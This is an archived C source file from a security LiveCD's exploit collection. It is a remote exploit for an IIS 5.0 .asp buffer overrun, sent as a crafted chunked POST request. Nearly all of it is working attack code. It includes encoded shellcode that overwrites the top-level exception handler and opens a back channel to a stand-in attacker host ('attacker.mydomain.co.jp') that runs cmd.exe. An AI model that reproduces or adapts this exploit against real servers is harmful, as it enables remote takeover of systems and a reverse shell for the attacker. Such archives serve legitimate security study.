home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / iis-asp-overflow.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  7KB  |  246 lines
  1.  
  2. /*
  3.  IIS5.0 .asp overrun remote exploit
  4.  Programmed by hsj  : 02.04.14
  5.  
  6.  code flow:
  7.   overrun -> exception -> rewrite top-level handler ->
  8.   exception -> shellcode -> make back channel ->
  9.   exec cmd.exe
  10. */
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14. #include <signal.h>
  15. #include <sys/types.h>
  16. #include <sys/socket.h>
  17. #include <sys/ioctl.h>
  18. #include <sys/time.h>
  19. #include <sys/wait.h>
  20. #include <errno.h>
  21. #include <unistd.h>
  22. #include <fcntl.h>
  23. #include <netinet/in.h>
  24. #include <limits.h>
  25. #include <netdb.h>
  26. #include <arpa/inet.h>
  27.  
  28. #define RET                 0x0045C560  /* our payload. ugh, direct
  29. jump!!!#$% */
  30. #define REWRITE             0x77eaf44c  /* top-level exception handler */
  31.  
  32. #define PORT                25
  33. #define ADDR                "attacker.mydomain.co.jp"
  34. #define PORT_OFFSET         518
  35. #define ADDR_OFFSET         523
  36. unsigned char shellcode[]=
  37. /* decoder */
  38. "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1d\x8d\xa0\xf0"
  39. "\xfb\xff\xff\x83\xe4\xfc\x8d\x6c\x24\x10\x33\xc9\x66\xb9\x85\x02"
  40. "\x80\x30\x95\x40\xe2\xfa"
  41. /* code */
  42. "\x7d\x21\x95\x95\x95\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
  43. "\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7\xec\xd4"
  44. "\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd6\xe7\xf0\xf4"
  45. "\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb"
  46. "\xf4\xf8\xf0\xf1\xc5\xfc\xe5\xf0\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc"
  47. "\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0"
  48. "\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9"
  49. "\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xe2\xe6\xa7\xca\xa6\xa7"
  50. "\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe"
  51. "\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6"
  52. "\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3"
  53. "\x95\xf6\xf8\xf1\xbb\xf0\xed\xf0\x95\xcf\xc7\x2e\x95\x95\x65\xe2"
  54. "\x14\xae\xd8\xcf\x05\x95\xe1\x96\xde\x7e\x60\x1e\xe6\xa9\x96\x66"
  55. "\x1e\xe3\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xc3\xa6\x55"
  56. "\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\xa6\x5c\x24\x9b\x66\x33\xcc\xca"
  57. "\xe1\x9d\x16\x52\x91\xd5\x77\x7d\x6a\x74\xcb\x1e\xc3\xb1\x96\x46"
  58. "\x44\x75\x96\x57\xa6\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74"
  59. "\x97\x96\x54\x1e\x85\x96\x46\xcb\x1e\x6b\xa6\x5c\x24\x9c\x7d\xdf"
  60. "\x94\x95\x95\x16\x53\x99\xc7\xc3\x6a\xc2\x49\xcf\x1e\x4d\xa6\x5c"
  61. "\x24\x93\x7d\xa3\x94\x95\x95\x16\x53\x90\x52\xd0\x95\x99\x95\x95"
  62. "\x95\x52\xd0\x91\x95\x95\x95\x95\x52\xd0\x9d\x94\x95\x95\x95\xff"
  63. "\x95\xc0\x18\xd0\x65\xc5\x18\xd0\x61\xc5\x6a\xc2\x5d\xff\x95\xc0"
  64. "\x18\xd0\x6d\xc5\x18\xd0\x69\xc5\x6a\xc2\x5d\xa6\x55\xa6\x5c\x24"
  65. "\x84\xc2\x1e\x68\x66\x3e\xca\x52\xd0\x95\xd1\x95\x95\x95\x1e\xd0"
  66. "\x65\x1c\xd0\xa9\x1c\xd0\xd5\x1e\xd0\x69\x1c\xd0\xad\x52\xd0\xb9"
  67. "\x94\x94\x95\x95\x18\xd0\xd1\xc5\xc0\xc4\xc4\xc4\xd4\xc4\xdc\xc4"
  68. "\xc4\xc3\xc4\x6a\xc2\x59\x6a\xe0\x65\x6a\xc2\x71\x6a\xe0\x69\x6a"
  69. "\xc2\x71\xc0\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x30"
  70. "\x95\x95\x95\xc5\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11"
  71. "\x01\x95\x95\x95\x1e\x4d\xf3\x52\xd0\x95\x97\x95\xf3\x52\xd0\x97"
  72. "\x2e\x3f\x52\xd0\x91\x48\x59\x2e\x3f\xff\x85\xc0\xc6\x6a\xc2\x61"
  73. "\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc2\xc4\xc4\xc4\x6a\xe0\x61\x6a"
  74. "\xc2\x45\x10\x55\xe1\xcb\x05\x05\x05\x05\x16\xaa\x95\xe1\xba\x05"
  75. "\x05\x05\x05\xff\x95\xc2\xfd\x95\x91\x95\x95\xc0\x6a\xe0\x61\x6a"
  76. "\xc2\x4d\x10\x55\xe1\xab\x05\x05\x05\x05\xff\x95\x6a\xa2\xc0\xc6"
  77. "\x6a\xc2\x6d\x16\x6d\x6a\xe1\xb9\x05\x05\x05\x05\x7e\x27\xff\x95"
  78. "\xfd\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xeb\x83\x05\x05"
  79. "\x05\x05\xff\x95\xc2\xc5\xc0\x6a\xe0\x6d\x6a\xc2\x41\xff\xa7\x6a"
  80. "\xc2\x49\x7e\x19\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\x1f\x93\xd3"
  81. "\x11\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x1c\x92\xd2\xd2"
  82. "\xd2\xd2\x77\x7c\x56";
  83.  
  84. unsigned int resolve(char *name)
  85. {
  86.     struct hostent *he;
  87.     unsigned int ip;
  88.  
  89.     if((ip=inet_addr(name))==(-1))
  90.     {
  91.         if((he=gethostbyname(name))==0)
  92.             return 0;
  93.         memcpy(&ip,he->h_addr,4);
  94.     }
  95.     return ip;
  96. }
  97.  
  98. int make_connection(char *address,int port)
  99. {
  100.     struct sockaddr_in server,target;
  101.     int s,i,bf;
  102.     fd_set wd;
  103.     struct timeval tv;
  104.  
  105.     s = socket(AF_INET,SOCK_STREAM,0);
  106.     if(s<0)
  107.         return -1;
  108.     memset((char *)&server,0,sizeof(server));
  109.     server.sin_family = AF_INET;
  110.     server.sin_addr.s_addr = htonl(INADDR_ANY);
  111.     server.sin_port = 0;
  112.  
  113.     target.sin_family = AF_INET;
  114.     target.sin_addr.s_addr = resolve(address);
  115.     if(target.sin_addr.s_addr==0)
  116.     {
  117.         close(s);
  118.         return -2;
  119.     }
  120.     target.sin_port = htons(port);
  121.     bf = 1;
  122.     ioctl(s,FIONBIO,&bf);
  123.     tv.tv_sec = 10;
  124.     tv.tv_usec = 0;
  125.     FD_ZERO(&wd);
  126.     FD_SET(s,&wd);
  127.     connect(s,(struct sockaddr *)&target,sizeof(target));
  128.     if((i=select(s+1,0,&wd,0,&tv))==(-1))
  129.     {
  130.         close(s);
  131.         return -3;
  132.     }
  133.     if(i==0)
  134.     {
  135.         close(s);
  136.         return -4;
  137.     }
  138.     i = sizeof(int);
  139.     getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
  140.     if((bf!=0)||(i!=sizeof(int)))
  141.     {
  142.         close(s);
  143.         errno = bf;
  144.         return -5;
  145.     }
  146.     ioctl(s,FIONBIO,&bf);
  147.     return s;
  148. }
  149.  
  150. int main(int argc,char *argv[])
  151. {
  152.     int i,j,s;
  153.     unsigned int cb;
  154.     unsigned short port;
  155.     char buf[8192],buf2[16384],path[256];
  156.  
  157.     if(argc<3)
  158.     {
  159.         printf("usage :$ %s ip port [asp-path]\n",argv[0]);
  160.         return -1;
  161.     }
  162.     if(argc>3)
  163.     {
  164.         strncpy(path,argv[3],sizeof(path));
  165.         path[sizeof(path)-1] = 0;
  166.     }
  167.     else
  168.         strcpy(path,"/iisstart.asp");
  169.  
  170.     if(!(cb=resolve(ADDR)))
  171.         return -2;
  172.  
  173.     s = make_connection(argv[1],atoi(argv[2]));
  174.     if(s<0)
  175.     {
  176.         printf("connect error:[%d].\n",s);
  177.         return -3;
  178.     }
  179.  
  180.     j = strlen(shellcode);
  181.     port = htons(PORT);
  182.     port ^= 0x9595;
  183.     cb ^= 0x95959595;
  184.     *(unsigned short *)&shellcode[PORT_OFFSET] = port;
  185.     *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
  186.     for(i=0;i<strlen(shellcode);i++)
  187.     {
  188.         if(((shellcode[i]>=0x09)&&(shellcode[i]<=0x0d))||
  189.            (shellcode[i]==0x25)||(shellcode[i]==0x2b)||
  190.            (shellcode[i]==0x3d))
  191.             break;
  192.     }
  193.     if(i!=j)
  194.     {
  195.         printf("bad portno or ip address...\n");
  196.         close(s);
  197.         return -4;
  198.     }
  199.  
  200.     for(i=0;i<sizeof(buf)-strlen(shellcode)-12-1;)
  201.     {
  202.         buf[i++] = 0xeb;
  203.         buf[i++] = 0x06;
  204.     }
  205.     *(unsigned int *)&buf[i] = 0x41414141;
  206.     *(unsigned int *)&buf[i+4] = 0x41414141;
  207.     *(unsigned int *)&buf[i+8] = 0x41414141;
  208.  
  209. memcpy(&buf[sizeof(buf)-strlen(shellcode)-1],shellcode,strlen(shellcode));
  210.     buf[sizeof(buf)-1] = 0;
  211.     sprintf(buf2,"POST %s?%s HTTP/1.0\r\n"
  212.                  "Content-Type: application/x-www-form-urlencoded\r\n"
  213.                  "Transfer-Encoding: chunked\r\n\r\n"
  214.                  "10\r\nABCDEFGHIJKLMNOP\r\n"
  215.                  "4\r\nXXXX\r\n"
  216.                  "4\r\nYYYY\r\n"
  217.                  "0\r\n\r\n\r\n",
  218.                  path,buf);
  219.     j = strlen(buf2);
  220.     *(unsigned int *)strstr(buf2,"YYYY") = REWRITE;
  221.     *(unsigned int *)strstr(buf2,"XXXX") = RET;
  222.     write(s,buf2,j);
  223.  
  224.     printf("---");
  225.     for(i=0;i<j;i++)
  226.     {
  227.         if((i%16)==0)
  228.             printf("\n");
  229.         printf("%02X ",buf2[i]&0xff);
  230.     }
  231.     printf("\n---\n");
  232.  
  233.     sleep(3);
  234.     shutdown(s,2);
  235.     close(s);
  236.  
  237.     printf("Done.\n");
  238.  
  239.     return 0;
  240. }
  241.  
  242.  
  243.  
  244.  
  245.  
  246.